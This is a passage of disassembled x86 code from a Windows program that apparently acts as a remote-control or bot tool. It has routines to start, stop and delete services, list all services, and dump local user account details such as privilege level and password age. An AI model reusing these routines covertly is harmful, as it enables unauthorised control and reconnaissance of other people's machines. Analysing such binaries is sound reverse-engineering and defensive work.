push ebx
push ebx
push ebx
lea eax, [ebp+var_364]
push eax
push ebx
call ds:dword_41F030 ; CreateProcessA
loc_405A94: ; CODE XREF: sub_405915+6D�j
pop esi
pop ebx
leave
retn
sub_405915 endp
; =============== S U B R O U T I N E =======================================
sub_405A98 proc near ; CODE XREF: sub_405AD5+41�p
arg_0 = dword ptr 4
arg_4 = dword ptr 8
arg_8 = dword ptr 0Ch
mov eax, [esp+arg_4]
push esi
push edi
mov edi, [esp+8+arg_8]
mov ecx, 1F4h
rep stosd
lea edi, [eax-1]
xor esi, esi
test edi, edi
jl short loc_405AD2
push ebx
mov ebx, edi
loc_405AB5: ; CODE XREF: sub_405A98+37�j
mov eax, [esp+0Ch+arg_0]
movsx eax, byte ptr [esi+eax]
push eax
call sub_4056EA
pop ecx
mov ecx, [esp+0Ch+arg_8]
inc esi
mov [ecx+eax*4], ebx
dec ebx
cmp esi, edi
jle short loc_405AB5
pop ebx
loc_405AD2: ; CODE XREF: sub_405A98+18�j
pop edi
pop esi
retn
sub_405A98 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_405AD5 proc near ; CODE XREF: sub_401D13+10�p
; sub_401D45+A0�p
var_100C = dword ptr -100Ch
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
mov eax, 100Ch
call sub_412DD0
mov eax, [ebp+arg_0]
lea edx, [eax+1]
loc_405AE8: ; CODE XREF: sub_405AD5+18�j
mov cl, [eax]
inc eax
test cl, cl
jnz short loc_405AE8
sub eax, edx
mov [ebp+var_4], eax
mov eax, [ebp+arg_4]
lea ecx, [eax+1]
loc_405AFA: ; CODE XREF: sub_405AD5+2A�j
mov dl, [eax]
inc eax
test dl, dl
jnz short loc_405AFA
push ebx
push esi
sub eax, ecx
mov esi, eax
push edi
lea eax, [ebp+var_100C]
push eax
push esi
push [ebp+arg_4]
mov [ebp+var_C], esi
call sub_405A98
add esp, 0Ch
dec esi
mov edi, esi
jmp short loc_405B97
; ---------------------------------------------------------------------------
loc_405B23: ; CODE XREF: sub_405AD5+C4�j
mov eax, [ebp+arg_4]
movsx eax, byte ptr [esi+eax]
push eax
call sub_413A6E
mov ebx, eax
mov eax, [ebp+arg_0]
movsx eax, byte ptr [edi+eax]
push eax
call sub_413A6E
cmp eax, ebx
pop ecx
pop ecx
jz short loc_405B95
loc_405B45: ; CODE XREF: sub_405AD5+BE�j
mov ebx, [ebp+arg_0]
xor eax, eax
mov al, [edi+ebx]
push eax
call sub_4056EA
mov edx, [ebp+var_C]
mov eax, [ebp+eax*4+var_100C]
pop ecx
mov ecx, edx
sub ecx, esi
cmp ecx, eax
jle short loc_405B68
mov eax, ecx
loc_405B68: ; CODE XREF: sub_405AD5+8F�j
add edi, eax
cmp edi, [ebp+var_4]
jge short loc_405BA5
mov eax, [ebp+arg_4]
lea esi, [edx-1]
movsx eax, byte ptr [esi+eax]
push eax
call sub_413A6E
movsx ecx, byte ptr [edi+ebx]
push ecx
mov [ebp+var_8], eax
call sub_413A6E
pop ecx
pop ecx
mov ecx, [ebp+var_8]
cmp eax, ecx
jnz short loc_405B45
loc_405B95: ; CODE XREF: sub_405AD5+6E�j
dec edi
dec esi
loc_405B97: ; CODE XREF: sub_405AD5+4C�j
test esi, esi
jg short loc_405B23
mov eax, [ebp+arg_0]
add eax, edi
loc_405BA0: ; CODE XREF: sub_405AD5+D2�j
pop edi
pop esi
pop ebx
leave
retn
; ---------------------------------------------------------------------------
loc_405BA5: ; CODE XREF: sub_405AD5+98�j
xor eax, eax
jmp short loc_405BA0
sub_405AD5 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_405BA9 proc near ; CODE XREF: sub_40668A+20�p
var_1C = byte ptr -1Ch
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
arg_10 = dword ptr 18h
push ebp
mov ebp, esp
sub esp, 1Ch
push ebx
push edi
push 0F003Fh
xor ebx, ebx
push ebx
push ebx
call dword_43355C ; OpenSCManagerA
mov edi, eax
cmp edi, ebx
jnz short loc_405BD0
call ds:dword_41F008 ; RtlGetLastWin32Error
mov ebx, eax
jmp short loc_405C45
; ---------------------------------------------------------------------------
loc_405BD0: ; CODE XREF: sub_405BA9+1B�j
push esi
push 0F01FFh
push [ebp+arg_4]
push edi
call dword_4335D8 ; OpenServiceA
mov esi, eax
cmp esi, ebx
jnz short loc_405BF0
call ds:dword_41F008 ; RtlGetLastWin32Error
mov ebx, eax
jmp short loc_405C3D
; ---------------------------------------------------------------------------
loc_405BF0: ; CODE XREF: sub_405BA9+3B�j
mov eax, [ebp+arg_0]
cmp eax, 1
jz short loc_405C23
cmp eax, 3
jz short loc_405C14
jle short loc_405C36
cmp eax, 6
jg short loc_405C36
lea eax, [ebp+var_1C]
push eax
push [ebp+arg_8]
push esi
call dword_433580 ; ControlService
jmp short loc_405C2A
; ---------------------------------------------------------------------------
loc_405C14: ; CODE XREF: sub_405BA9+52�j
push [ebp+arg_10]
push [ebp+arg_C]
push esi
call dword_433564 ; StartServiceA
jmp short loc_405C2A
; ---------------------------------------------------------------------------
loc_405C23: ; CODE XREF: sub_405BA9+4D�j
push esi
call dword_433494 ; DeleteService
loc_405C2A: ; CODE XREF: sub_405BA9+69�j
; sub_405BA9+78�j
test eax, eax
jnz short loc_405C36
call ds:dword_41F008 ; RtlGetLastWin32Error
mov ebx, eax
loc_405C36: ; CODE XREF: sub_405BA9+54�j
; sub_405BA9+59�j ...
push esi
call dword_4334D0 ; CloseServiceHandle
loc_405C3D: ; CODE XREF: sub_405BA9+45�j
push edi
call dword_4334D0 ; CloseServiceHandle
pop esi
loc_405C45: ; CODE XREF: sub_405BA9+25�j
pop edi
mov eax, ebx
pop ebx
leave
retn
sub_405BA9 endp
; =============== S U B R O U T I N E =======================================
sub_405C4B proc near ; CODE XREF: sub_40668A:loc_4066D2�p
mov ecx, 420h
cmp eax, ecx
ja loc_405CFC
jz loc_405CF5
add ecx, 0FFFFFFFBh
cmp eax, ecx
ja short loc_405CBF
jz short loc_405CB5
mov ecx, eax
sub ecx, 3
jz short loc_405CAB
dec ecx
dec ecx
jz short loc_405CA1
dec ecx
jz short loc_405C97
sub ecx, 51h
jz short loc_405C8D
sub ecx, 24h
jnz loc_405D72 ; default
; jumptable 00405D19 cases 1,5,6,8,9,12,13,15,16
push offset aTheSpecifiedSe ; "The specified service name is invalid."
jmp loc_405D64
; ---------------------------------------------------------------------------
loc_405C8D: ; CODE XREF: sub_405C4B+2D�j
push offset aTheRequestedCo ; "The requested control code is undefined"...
jmp loc_405D64
; ---------------------------------------------------------------------------
loc_405C97: ; CODE XREF: sub_405C4B+28�j
push offset aTheHandleIsInv ; "The handle is invalid."
jmp loc_405D64
; ---------------------------------------------------------------------------
loc_405CA1: ; CODE XREF: sub_405C4B+25�j
push offset aTheHandleDoesN ; "The handle does not have the required a"...
jmp loc_405D64
; ---------------------------------------------------------------------------
loc_405CAB: ; CODE XREF: sub_405C4B+21�j
push offset aTheServiceBina ; "The service binary file could not be fo"...
jmp loc_405D64
; ---------------------------------------------------------------------------
loc_405CB5: ; CODE XREF: sub_405C4B+1A�j
push offset aTheServiceCann ; "The service cannot be stopped because o"...
jmp loc_405D64
; ---------------------------------------------------------------------------
loc_405CBF: ; CODE XREF: sub_405C4B+18�j
mov ecx, eax
sub ecx, 41Ch
jz short loc_405CEE
dec ecx
jz short loc_405CE7
dec ecx
jz short loc_405CE0
dec ecx
jnz loc_405D72 ; default
; jumptable 00405D19 cases 1,5,6,8,9,12,13,15,16
push offset aTheDatabaseIsL ; "The database is locked."
jmp loc_405D64
; ---------------------------------------------------------------------------
loc_405CE0: ; CODE XREF: sub_405C4B+82�j
push offset aAThreadCouldNo ; "A thread could not be created for the s"...
jmp short loc_405D64
; ---------------------------------------------------------------------------
loc_405CE7: ; CODE XREF: sub_405C4B+7F�j
push offset aTheProcessForT ; "The process for the service was started"...
jmp short loc_405D64
; ---------------------------------------------------------------------------
loc_405CEE: ; CODE XREF: sub_405C4B+7C�j
push offset aTheRequested_0 ; "The requested control code is not valid"...
jmp short loc_405D64
; ---------------------------------------------------------------------------
loc_405CF5: ; CODE XREF: sub_405C4B+D�j
push offset aAnInstanceOfTh ; "An instance of the service is already r"...
jmp short loc_405D64
; ---------------------------------------------------------------------------
loc_405CFC: ; CODE XREF: sub_405C4B+7�j
mov ecx, 45Bh
cmp eax, ecx
ja short loc_405D72 ; default
; jumptable 00405D19 cases 1,5,6,8,9,12,13,15,16
jz short loc_405D5F
lea ecx, [eax-422h]
cmp ecx, 11h ; switch 18 cases
ja short loc_405D72 ; default
; jumptable 00405D19 cases 1,5,6,8,9,12,13,15,16
movzx ecx, ds:byte_405DB3[ecx]
jmp ds:off_405D8B[ecx*4] ; switch jump
loc_405D20: ; DATA XREF: .text:off_405D8B�o
push offset aTheSpecifiedDa ; jumptable 00405D19 case 7
jmp short loc_405D64
; ---------------------------------------------------------------------------
loc_405D27: ; CODE XREF: sub_405C4B+CE�j
; DATA XREF: .text:off_405D8B�o
push offset aTheServiceDepe ; jumptable 00405D19 case 17
jmp short loc_405D64
; ---------------------------------------------------------------------------
loc_405D2E: ; CODE XREF: sub_405C4B+CE�j
; DATA XREF: .text:off_405D8B�o
push offset aTheServiceDe_0 ; jumptable 00405D19 case 10
jmp short loc_405D64
; ---------------------------------------------------------------------------
loc_405D35: ; CODE XREF: sub_405C4B+CE�j
; DATA XREF: .text:off_405D8B�o
push offset aTheServiceHasB ; jumptable 00405D19 case 0
jmp short loc_405D64
; ---------------------------------------------------------------------------
loc_405D3C: ; CODE XREF: sub_405C4B+CE�j
; DATA XREF: .text:off_405D8B�o
push offset aTheSpecified_0 ; jumptable 00405D19 case 2
jmp short loc_405D64
; ---------------------------------------------------------------------------
loc_405D43: ; CODE XREF: sub_405C4B+CE�j
; DATA XREF: .text:off_405D8B�o
push offset aTheServiceCoul ; jumptable 00405D19 case 11
jmp short loc_405D64
; ---------------------------------------------------------------------------
loc_405D4A: ; CODE XREF: sub_405C4B+CE�j
; DATA XREF: .text:off_405D8B�o
push offset aTheServiceHa_0 ; jumptable 00405D19 case 14
jmp short loc_405D64
; ---------------------------------------------------------------------------
loc_405D51: ; CODE XREF: sub_405C4B+CE�j
; DATA XREF: .text:off_405D8B�o
push offset aTheRequested_1 ; jumptable 00405D19 case 3
jmp short loc_405D64
; ---------------------------------------------------------------------------
loc_405D58: ; CODE XREF: sub_405C4B+CE�j
; DATA XREF: .text:off_405D8B�o
push offset aTheServiceHasN ; jumptable 00405D19 case 4
jmp short loc_405D64
; ---------------------------------------------------------------------------
loc_405D5F: ; CODE XREF: sub_405C4B+BA�j
push offset aTheSystemIsShu ; "The system is shutting down."
loc_405D64: ; CODE XREF: sub_405C4B+3D�j
; sub_405C4B+47�j ...
push offset dword_433860
call sub_412BB5
pop ecx
pop ecx
jmp short loc_405D85
; ---------------------------------------------------------------------------
loc_405D72: ; CODE XREF: sub_405C4B+32�j
; sub_405C4B+85�j ...
push eax ; default
; jumptable 00405D19 cases 1,5,6,8,9,12,13,15,16
push offset aAnUnknownErr_0 ; "An unknown error occurred: <%ld>"
push offset dword_433860
call sub_412BB5
add esp, 0Ch
loc_405D85: ; CODE XREF: sub_405C4B+125�j
mov eax, offset dword_433860
retn
sub_405C4B endp
; ---------------------------------------------------------------------------
off_405D8B dd offset loc_405D35 ; DATA XREF: sub_405C4B+CE�r
dd offset loc_405D3C ; jump table for switch statement
dd offset loc_405D51
dd offset loc_405D58
dd offset loc_405D20
dd offset loc_405D2E
dd offset loc_405D43
dd offset loc_405D4A
dd offset loc_405D27
dd offset loc_405D72
byte_405DB3 db 0, 9, 1, 2 ; DATA XREF: sub_405C4B+C7�r
db 3, 9, 9, 4 ; indirect table for switch statement
db 9, 9, 5, 6
db 9, 9, 7, 9
db 9, 8
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_405DC5 proc near ; CODE XREF: sub_4078FA+1C1D�p
var_38C = byte ptr -38Ch
var_18C = byte ptr -18Ch
var_188 = byte ptr -188h
var_24 = byte ptr -24h
var_20 = byte ptr -20h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
sub esp, 38Ch
push ebx
push esi
push edi
xor ebx, ebx
push 0F003Fh
push ebx
push ebx
mov [ebp+var_8], ebx
call dword_43355C ; OpenSCManagerA
push ebx
push [ebp+arg_8]
mov [ebp+var_C], eax
push offset aTheFollowingWi ; "The following Windows services are regi"...
push [ebp+arg_4]
push [ebp+arg_0]
call sub_4045DD
add esp, 14h
loc_405DFD: ; CODE XREF: sub_405DC5+123�j
lea eax, [ebp+var_8]
push eax
lea eax, [ebp+var_4]
push eax
lea eax, [ebp+var_24]
push eax
push 168h
lea eax, [ebp+var_18C]
push eax
push 3
push 30h
push [ebp+var_C]
call dword_43356C ; EnumServicesStatusA
test eax, eax
jnz short loc_405E37
call ds:dword_41F008 ; RtlGetLastWin32Error
cmp eax, 0EAh
jnz loc_405EEE
loc_405E37: ; CODE XREF: sub_405DC5+5F�j
xor edi, edi
cmp [ebp+var_4], ebx
jle loc_405EE5
lea esi, [ebp+var_188]
loc_405E48: ; CODE XREF: sub_405DC5+11A�j
mov eax, [esi+8]
dec eax
jz short loc_405E94
dec eax
jz short loc_405E8D
dec eax
jz short loc_405E86
dec eax
jz short loc_405E7F
dec eax
jz short loc_405E78
dec eax
jz short loc_405E71
dec eax
lea eax, [ebp+var_20]
jz short loc_405E6A
push offset aUnknown_0 ; " Unknown"
jmp short loc_405E9C
; ---------------------------------------------------------------------------
loc_405E6A: ; CODE XREF: sub_405DC5+9C�j
push offset aPaused_0 ; " Paused"
jmp short loc_405E9C
; ---------------------------------------------------------------------------
loc_405E71: ; CODE XREF: sub_405DC5+96�j
push offset aPausing ; " Pausing"
jmp short loc_405E99
; ---------------------------------------------------------------------------
loc_405E78: ; CODE XREF: sub_405DC5+93�j
push offset aContinuing ; " Continuing"
jmp short loc_405E99
; ---------------------------------------------------------------------------
loc_405E7F: ; CODE XREF: sub_405DC5+90�j
push offset aRunning ; " Running"
jmp short loc_405E99
; ---------------------------------------------------------------------------
loc_405E86: ; CODE XREF: sub_405DC5+8D�j
push offset aStoping ; " Stoping"
jmp short loc_405E99
; ---------------------------------------------------------------------------
loc_405E8D: ; CODE XREF: sub_405DC5+8A�j
push offset aStarting ; " Starting"
jmp short loc_405E99
; ---------------------------------------------------------------------------
loc_405E94: ; CODE XREF: sub_405DC5+87�j
push offset aStopped ; " Stopped"
loc_405E99: ; CODE XREF: sub_405DC5+B1�j
; sub_405DC5+B8�j ...
lea eax, [ebp+var_20]
loc_405E9C: ; CODE XREF: sub_405DC5+A3�j
; sub_405DC5+AA�j
push eax
call sub_412BB5
pop ecx
pop ecx
push dword ptr [esi]
lea eax, [ebp+var_20]
push dword ptr [esi-4]
push eax
lea eax, [ebp+var_38C]
push offset aSSS_0 ; "%s: %s (%s)"
push eax
call sub_412BB5
push 1
push [ebp+arg_8]
lea eax, [ebp+var_38C]
push eax
push [ebp+arg_4]
push [ebp+arg_0]
call sub_4045DD
add esp, 28h
inc edi
add esi, 24h
cmp edi, [ebp+var_4]
jl loc_405E48
loc_405EE5: ; CODE XREF: sub_405DC5+77�j
cmp [ebp+var_8], ebx
jnz loc_405DFD
loc_405EEE: ; CODE XREF: sub_405DC5+6C�j
push [ebp+var_C]
call dword_4334D0 ; CloseServiceHandle
xor eax, eax
cmp eax, [ebp+var_4]
pop edi
sbb eax, eax
pop esi
neg eax
pop ebx
leave
retn
sub_405DC5 endp
; =============== S U B R O U T I N E =======================================
sub_405F05 proc near ; CODE XREF: sub_405FC7+A�p
; sub_405FC7+14�p ...
arg_0 = dword ptr 4
push ebp
mov ebp, [esp+4+arg_0]
xor eax, eax
cmp ebp, eax
jnz short loc_405F12
pop ebp
retn
; ---------------------------------------------------------------------------
loc_405F12: ; CODE XREF: sub_405F05+9�j
push ebx
push esi
mov esi, ds:dword_41F0A8
push edi
push eax
push eax
push 0FFFFFFFFh
push ebp
push 1
push eax
call esi ; MultiByteToWideChar
mov edi, eax
lea eax, [edi+edi+2]
push eax
call sub_413A90
pop ecx
push edi
mov ebx, eax
push ebx
push 0FFFFFFFFh
push ebp
push 1
push 0
call esi ; MultiByteToWideChar
pop edi
pop esi
mov eax, ebx
pop ebx
pop ebp
retn
sub_405F05 endp
; =============== S U B R O U T I N E =======================================
sub_405F46 proc near ; CODE XREF: sub_40E9C5+248�p
arg_10 = dword ptr 14h
arg_14 = dword ptr 18h
arg_20 = dword ptr 24h
mov eax, offset loc_41E8BA
call sub_413EF4
push esi
xor esi, esi
cmp [esp+4+arg_10], esi
jnz short loc_405F5D
xor eax, eax
jmp short loc_405FB9
; ---------------------------------------------------------------------------
loc_405F5D: ; CODE XREF: sub_405F46+11�j
push ebx
push ebp
push edi
mov edi, ds:dword_41F0AC
push esi
push esi
push esi
push esi
push 0FFFFFFFFh
push [esp+24h+arg_10]
mov ebx, 400h
push ebx
push esi
call edi ; WideCharToMultiByte
test byte ptr dword_4338C0, 1
mov ebp, eax
jnz short loc_405F9E
or dword_4338C0, 1
lea eax, [ebp+1]
push eax
mov [esp+4+arg_14], esi
call sub_413A90
pop ecx
mov dword_4338BC, eax
loc_405F9E: ; CODE XREF: sub_405F46+3C�j
push esi
push esi
push ebp
push dword_4338BC
push 0FFFFFFFFh
push [esp+14h+arg_20]
push ebx
push esi
call edi ; WideCharToMultiByte
mov eax, dword_4338BC
pop edi
pop ebp
pop ebx
loc_405FB9: ; CODE XREF: sub_405F46+15�j
mov ecx, [esp+4]
pop esi
mov large fs:0, ecx
leave
retn
sub_405F46 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_405FC7 proc near ; CODE XREF: sub_406702+6C�p
; sub_40ECEC+18F�p ...
var_24 = dword ptr -24h
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
var_18 = dword ptr -18h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = byte ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
sub esp, 24h
push edi
push [ebp+arg_0]
call sub_405F05
push [ebp+arg_4]
mov edi, eax
call sub_405F05
push 24h
push [ebp+arg_4]
mov [ebp+var_24], eax
call sub_413F30
push [ebp+arg_8]
neg eax
sbb eax, eax
and [ebp+var_1C], 0
or [ebp+var_14], 0FFFFFFFFh
and [ebp+var_10], 0
and eax, 80000000h
mov [ebp+var_20], eax
mov [ebp+var_18], 7Fh
call sub_405F05
and [ebp+var_8], 0
add esp, 14h
mov [ebp+var_C], eax
lea eax, [ebp+var_4]
push eax
lea eax, [ebp+var_24]
push eax
push 2
push edi
call dword_433488
pop edi
leave
retn
sub_405FC7 endp
; =============== S U B R O U T I N E =======================================
sub_406032 proc near ; CODE XREF: sub_406702+20�p
; sub_40E9C5+1BD�p ...
arg_0 = dword ptr 4
arg_4 = dword ptr 8
push esi
push [esp+4+arg_0]
call sub_405F05
push [esp+8+arg_4]
mov esi, eax
call sub_405F05
pop ecx
pop ecx
push 0
push eax
push esi
call dword_4334A4
pop esi
retn
sub_406032 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_406055 proc near ; CODE XREF: sub_4068DF+4C�p
var_24 = dword ptr -24h
var_20 = dword ptr -20h
var_18 = dword ptr -18h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
sub esp, 24h
and [ebp+var_4], 0
push edi
push [ebp+arg_0]
call sub_405F05
push [ebp+arg_4]
mov edi, eax
call sub_405F05
push [ebp+arg_8]
mov [ebp+var_24], eax
call sub_405F05
and [ebp+var_14], 0
and [ebp+var_10], 0
and [ebp+var_8], 0
add esp, 0Ch
lea ecx, [ebp+var_4]
push ecx
mov [ebp+var_20], eax
xor eax, eax
lea ecx, [ebp+var_24]
inc eax
push ecx
push eax
push edi
mov [ebp+var_18], eax
mov [ebp+var_C], 10001h
call dword_43346C
pop edi
leave
retn
sub_406055 endp
; =============== S U B R O U T I N E =======================================
sub_4060AF proc near ; CODE XREF: sub_4068DF+39�p
arg_0 = dword ptr 4
arg_4 = dword ptr 8
push esi
push [esp+4+arg_0]
call sub_405F05
push [esp+8+arg_4]
mov esi, eax
call sub_405F05
pop ecx
pop ecx
push eax
push esi
call dword_433568
pop esi
retn
sub_4060AF endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4060D0 proc near ; CODE XREF: sub_4068DF+2D�p
var_208 = byte ptr -208h
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
arg_10 = dword ptr 18h
push ebp
mov ebp, esp
sub esp, 208h
and [ebp+var_4], 0
push esi
push [ebp+arg_0]
call sub_405F05
push [ebp+arg_4]
mov esi, eax
call sub_405F05
pop ecx
pop ecx
lea ecx, [ebp+var_4]
push ecx
push 0Bh
push eax
push esi
call dword_43348C
test eax, eax
mov [ebp+var_8], eax
jnz loc_40645D
mov eax, [ebp+var_4]
test eax, eax
jz loc_406498
push ebx
push edi
push dword ptr [eax]
lea eax, [ebp+var_208]
push offset aAccountS ; "Account: %S"
push eax
call sub_412BB5
mov esi, [ebp+arg_10]
mov edi, [ebp+arg_C]
mov ebx, [ebp+arg_8]
push 1
push esi
lea eax, [ebp+var_208]
push eax
push edi
push ebx
call sub_4045DD
mov eax, [ebp+var_4]
push dword ptr [eax+0Ch]
lea eax, [ebp+var_208]
push offset aFullNameS ; "Full Name: %S"
push eax
call sub_412BB5
push 1
push esi
lea eax, [ebp+var_208]
push eax
push edi
push ebx
call sub_4045DD
mov eax, [ebp+var_4]
add esp, 40h
push dword ptr [eax+8]
lea eax, [ebp+var_208]
push offset aUserCommentS ; "User Comment: %S"
push eax
call sub_412BB5
push 1
push esi
lea eax, [ebp+var_208]
push eax
push edi
push ebx
call sub_4045DD
mov eax, [ebp+var_4]
push dword ptr [eax+4]
lea eax, [ebp+var_208]
push offset aCommentS ; "Comment: %S"
push eax
call sub_412BB5
push 1
push esi
lea eax, [ebp+var_208]
push eax
push edi
push ebx
call sub_4045DD
mov eax, [ebp+var_4]
mov eax, [eax+10h]
add esp, 40h
sub eax, 0
jz short loc_4061E9
dec eax
jz short loc_4061E2
dec eax
jz short loc_4061DB
mov eax, offset aUnknown ; "Unknown"
jmp short loc_4061EE
; ---------------------------------------------------------------------------
loc_4061DB: ; CODE XREF: sub_4060D0+102�j
mov eax, offset aAdministrator ; "Administrator"
jmp short loc_4061EE
; ---------------------------------------------------------------------------
loc_4061E2: ; CODE XREF: sub_4060D0+FF�j
mov eax, offset aUser_1 ; "User"
jmp short loc_4061EE
; ---------------------------------------------------------------------------
loc_4061E9: ; CODE XREF: sub_4060D0+FC�j
mov eax, offset aGuest ; "Guest"
loc_4061EE: ; CODE XREF: sub_4060D0+109�j
; sub_4060D0+110�j ...
push eax
lea eax, [ebp+var_208]
push offset aPrivilegeLevel ; "Privilege Level: %s"
push eax
call sub_412BB5
push 1
push esi
lea eax, [ebp+var_208]
push eax
push edi
push ebx
call sub_4045DD
mov eax, [ebp+var_4]
push dword ptr [eax+14h]
lea eax, [ebp+var_208]
push offset aAuthFlagsD ; "Auth Flags: %d"
push eax
call sub_412BB5
push 1
push esi
lea eax, [ebp+var_208]
push eax
push edi
push ebx
call sub_4045DD
mov eax, [ebp+var_4]
add esp, 40h
push dword ptr [eax+1Ch]
lea eax, [ebp+var_208]
push offset aHomeDirectoryS ; "Home Directory: %S"
push eax
call sub_412BB5
push 1
push esi
lea eax, [ebp+var_208]
push eax
push edi
push ebx
call sub_4045DD
mov eax, [ebp+var_4]
push dword ptr [eax+20h]
lea eax, [ebp+var_208]
push offset aParametersS ; "Parameters: %S"
push eax
call sub_412BB5
push 1
push esi
lea eax, [ebp+var_208]
push eax
push edi
push ebx
call sub_4045DD
mov eax, [ebp+var_4]
add esp, 40h
push dword ptr [eax+18h]
lea eax, [ebp+var_208]
push offset aPasswordAgeD ; "Password Age: %d"
push eax
call sub_412BB5
push 1
push esi
lea eax, [ebp+var_208]
push eax
push edi
push ebx
call sub_4045DD
mov eax, [ebp+var_4]
push dword ptr [eax+2Ch]
lea eax, [ebp+var_208]
push offset aBadPasswordCou ; "Bad Password Count: %d"
push eax
call sub_412BB5
push 1
push esi
lea eax, [ebp+var_208]
push eax
push edi
push ebx
call sub_4045DD
mov eax, [ebp+var_4]
add esp, 40h
push dword ptr [eax+30h]
lea eax, [ebp+var_208]
push offset aNumberOfLogins ; "Number of Logins: %d"
push eax
call sub_412BB5
push 1
push esi
lea eax, [ebp+var_208]
push eax
push edi
push ebx
call sub_4045DD
mov eax, [ebp+var_4]
push dword ptr [eax+24h]
lea eax, [ebp+var_208]
push offset aLastLogonD ; "Last Logon: %d"
push eax
call sub_412BB5
push 1
push esi
lea eax, [ebp+var_208]
push eax
push edi
push ebx
call sub_4045DD
mov eax, [ebp+var_4]
add esp, 40h
push dword ptr [eax+28h]
lea eax, [ebp+var_208]
push offset aLastLogoffD ; "Last Logoff: %d"
push eax
call sub_412BB5
push 1
push esi
lea eax, [ebp+var_208]
push eax
push edi
push ebx
call sub_4045DD
mov eax, [ebp+var_4]
push dword ptr [eax+34h]
lea eax, [ebp+var_208]
push offset aLogonServerS ; "Logon Server: %S"
push eax
call sub_412BB5
push 1
push esi
lea eax, [ebp+var_208]
push eax
push edi
push ebx
call sub_4045DD
mov eax, [ebp+var_4]
add esp, 40h
push dword ptr [eax+3Ch]
lea eax, [ebp+var_208]
push offset aWorkstationsS ; "Workstations: %S"
push eax
call sub_412BB5
push 1
push esi
lea eax, [ebp+var_208]
push eax
push edi
push ebx
call sub_4045DD
mov eax, [ebp+var_4]
push dword ptr [eax+38h]
lea eax, [ebp+var_208]
push offset aCountryCodeD ; "Country Code: %d"
push eax
call sub_412BB5
push 1
push esi
lea eax, [ebp+var_208]
push eax
push edi
push ebx
call sub_4045DD
mov eax, [ebp+var_4]
add esp, 40h
push dword ptr [eax+4Ch]
lea eax, [ebp+var_208]
push offset aUserSLanguageD ; "User's Language: %d"
push eax
call sub_412BB5
push 1
push esi
lea eax, [ebp+var_208]
push eax
push edi
push ebx
call sub_4045DD
mov eax, [ebp+var_4]
push dword ptr [eax+40h]
lea eax, [ebp+var_208]
push offset aMax_StorageD ; "Max. Storage: %d"
push eax
call sub_412BB5
push 1
push esi
lea eax, [ebp+var_208]
push eax
push edi
push ebx
call sub_4045DD
mov eax, [ebp+var_4]
add esp, 40h
push dword ptr [eax+44h]
lea eax, [ebp+var_208]
push offset aUnitsPerWeekD ; "Units Per Week: %d"
push eax
call sub_412BB5
push 1
push esi
lea eax, [ebp+var_208]
push eax
push edi
push ebx
call sub_4045DD
add esp, 20h
pop edi
pop ebx
jmp short loc_406489
; ---------------------------------------------------------------------------
loc_40645D: ; CODE XREF: sub_4060D0+35�j
push eax
lea eax, [ebp+var_208]
push offset aNetUserInfoErr ; "[NET]: User info error: <%ld>"
push eax
call sub_412BB5
push 0
push [ebp+arg_10]
lea eax, [ebp+var_208]
push eax
push [ebp+arg_C]
push [ebp+arg_8]
call sub_4045DD
add esp, 20h
loc_406489: ; CODE XREF: sub_4060D0+38B�j
cmp [ebp+var_4], 0
jz short loc_406498
push [ebp+var_4]
call dword_4334D8
loc_406498: ; CODE XREF: sub_4060D0+40�j
; sub_4060D0+3BD�j
mov eax, [ebp+var_8]
pop esi
leave
retn
sub_4060D0 endp
; =============== S U B R O U T I N E =======================================
sub_40649E proc near ; CODE XREF: sub_4065CE+9E�p
; sub_406702:loc_406742�p ...
mov ecx, 858h
cmp eax, ecx
ja loc_40654C
jz loc_406545
cmp eax, 7Bh
ja short loc_406511
jz short loc_406507
cmp eax, 5
jz short loc_4064FD
cmp eax, 8
jz short loc_4064F3
cmp eax, 32h
jz short loc_4064E9
cmp eax, 35h
jz short loc_4064DF
cmp eax, 57h
jnz loc_40659B
push offset aInvalidParamet ; "Invalid parameter."
jmp loc_4065BC
; ---------------------------------------------------------------------------
loc_4064DF: ; CODE XREF: sub_40649E+2C�j
push offset aServerNameNotF ; "Server name not found."
jmp loc_4065BC
; ---------------------------------------------------------------------------
loc_4064E9: ; CODE XREF: sub_40649E+27�j
push offset aThisNetworkReq ; "This network request is not supported."
jmp loc_4065BC
; ---------------------------------------------------------------------------
loc_4064F3: ; CODE XREF: sub_40649E+22�j
push offset aNotEnoughMemor ; "Not enough memory."
jmp loc_4065BC
; ---------------------------------------------------------------------------
loc_4064FD: ; CODE XREF: sub_40649E+1D�j
push offset aAccessDenied_ ; "Access denied."
jmp loc_4065BC
; ---------------------------------------------------------------------------
loc_406507: ; CODE XREF: sub_40649E+18�j
push offset aTheNameIsInval ; "The name is invalid."
jmp loc_4065BC
; ---------------------------------------------------------------------------
loc_406511: ; CODE XREF: sub_40649E+16�j
sub eax, 7Ch
jz short loc_40653E
sub eax, 7C8h
jz short loc_406537
dec eax
jz short loc_40652D
dec eax
jnz short loc_40659B
push offset aDuplicateShare ; "Duplicate share name."
jmp loc_4065BC
; ---------------------------------------------------------------------------
